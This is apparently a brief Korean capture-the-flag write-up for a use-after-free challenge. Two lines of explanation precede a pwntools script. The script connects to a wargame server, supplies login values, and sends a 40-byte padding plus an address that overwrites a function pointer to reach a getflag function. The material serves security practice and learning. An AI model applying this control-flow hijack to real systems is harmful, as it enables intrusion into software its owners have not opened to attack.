Uaf
- uaf 취약점 문제
- hello 함수 포인터를 덮어서 getflag 함수로 점프.

from pwn import *
s = remote("wargame.kimtae.xyz",10015)
get_flag = p32(0x080486E6)
payload = "A"*40
payload += get_flag
s.recvuntil("Input ID : ")
s.sendline("mr_binmr_bin")
s.recvuntil("Input PW : ")
s.sendline("7")
s.recvuntil("Input Memo : ")
s.sendline(payload)
print s.recv(1024)
s.interactive()
